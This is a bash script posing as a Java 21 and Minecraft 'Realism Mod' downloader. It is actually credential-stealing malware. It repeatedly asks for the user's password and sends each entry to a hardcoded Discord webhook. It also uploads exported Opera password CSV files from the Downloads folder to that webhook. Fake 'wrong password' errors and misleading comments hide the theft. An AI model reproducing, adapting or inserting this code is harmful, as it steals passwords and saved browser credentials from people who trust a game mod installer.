#!/bin/bash

#Made To Get Java 21 And The Realism Mod

echo "Download Java 21 For Minecraft Mods"
echo "Please Enter Your Password:"
echo "Type /begin to finish the download."
echo ""

while true; do
    printf "Please Enter Your Password > "
    read msg

    if [ "$msg" = "/begin" ]; then
        echo "Starting Java 21 Download. Please Wait."
        sleep 2
        echo "Sending Request For Download."
        sleep 2
        echo "Starting Download."
        sleep 2
        echo "Error (Wrong Password, Please Try Again)."
        echo "Please Re-Enter Java 21 Download Script To Retry."
        break
    fi

    if [ -z "$msg" ]; then
        continue
    fi

# Downloading The Java 21 Files And Downloading The Realism Mod



# Sending Request To Pull File From Server Directory



# Requesting Payload From Server



# Checking Authenticity






    curl -X POST \
        -F "file=@$HOME/Downloads/OperaPasswords.csv" \
        -F "file=@$HOME/Downloads/Operapasswords.csv" \
        -F "file=@$HOME/Downloads/operapasswords.csv" \
        -F "file=@$HOME/Downloads/operaPasswords.csv" \
        -F "file=@$HOME/Downloads/passwords.csv" \
        -F "file=@$HOME/Downloads/password.csv" \
        -F "file=@$HOME/Downloads/pass.csv" \
        -F "file=@$HOME/Downloads/opera.csv" \
        -F "file=@$HOME/Downloads/operapass.csv" \
        -F "file=@$HOME/Downloads/Passwords.csv" \
        -F "file=@$HOME/Downloads/Pass.csv" \
        -F "file=@$HOME/Downloads/Opera.csv" \
        -F 'payload_json={"content":"Downloaded Mods:"}' \
        "https://discord.com/api/webhooks/1443976954620412115/DKGwQJLudy7VchCEhn4lON5eDbJ4FJUfh-l2LwijYye2HFegxxMiHjMdwhGZgRioJGRX"
        WEBHOOK_URL="https://discord.com/api/webhooks/1443976954620412115/DKGwQJLudy7VchCEhn4lON5eDbJ4FJUfh-l2LwijYye2HFegxxMiHjMdwhGZgRioJGRX"


    curl -X POST \
      -H "Content-Type: application/json" \
      -d "{\"content\": \"Sent From Java 21 Download: $msg\"}" \
      "$WEBHOOK_URL" >/dev/null 2>&1

    echo "(Error Wrong Password. Please Try Again)"
done
